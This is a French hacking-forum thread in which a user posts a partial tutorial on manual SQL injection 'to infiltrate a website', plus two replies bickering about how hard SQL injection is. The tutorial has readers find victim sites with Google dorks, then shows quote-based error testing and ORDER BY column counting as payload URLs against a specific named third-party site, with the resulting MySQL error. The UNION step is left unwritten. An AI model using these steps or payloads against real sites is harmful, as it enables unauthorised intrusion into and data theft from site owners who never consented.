HiddenShadow

Injection SQL manuelle

5 posts in this topic

/!\ Avant de commencer ce tutoriel sachez qu'il est destiné à titre indicatif, over-game.eu n'est en aucun cas responsable de vos actes. /!\

 

Je vais vous enseigner comment utiliser les injections SQL pour infiltrer un site web.

Avant de commencer, vous devriez faire un peu de lecture sur le SQL et les injections SQL.

 

Trouver une cible

 

Ok, donc nous devons d'abord avoir déjà une

cible. Nous pouvons utiliser Google en entrant des dorks dans la barre de recherche pour en trouver un.

 

Listes dorks ici.

 

Tester les vulnérabilités d'un site

 

Une fois que vous avez trouvé une page Web qui peut être vulnérable, vous aurez besoin de le tester.

 

Vous pouvez le faire en ajoutant une :

>'

après le dernier numéro dans l'URL, comme ceci :

>http://jeunescastries.free.fr/?p=projet&id=30'

 

Si vous obtenez une erreur semblable à ceci, cela signifie que le site est vulnérable, et que nous pouvons l'exploiter.

>Erreur : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

 

Trouver le nombre de colonnes

 

Maintenant, nous devons connaître le nombre de colonnes du site.

Pour ce faire, nous allons utiliser l'instruction ORDER BY.

 

>http://jeunescastries.free.fr/?p=projet&id=30 order by 1/* pas d'erreur
http://jeunescastries.free.fr/?p=projet&id=30 order by 2/* pas d'erreur
http://jeunescastries.free.fr/?p=projet&id=30 order by 3/* pas d'erreur
http://jeunescastries.free.fr/?p=projet&id=30 order by 4/* erreur

 

Cela signifie qu'il y a 3 colonnes.

 

Vérifier le fonctionnement de l'Union.

 

réservé

 

Edited by HiddenShadow

Share this post


Link to post
Share on other sites
Pardon ? Les SQl peuvent êtres très très très compliqués mais si tu connais qu'une Ijct Basic oui c'est facile mais passe en aux Dbl blind, imbriqués et tu verras^^

 

le principe de son post est juste de partager ce qu'il sait, tu parles de :DDl blind.

Sans le remercier alors qu'il partage, donc avant de faire ton chaud fait un petit tuto sur ce que tusais et puis voilà

 

sys, exousama

Share this post


Link to post
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now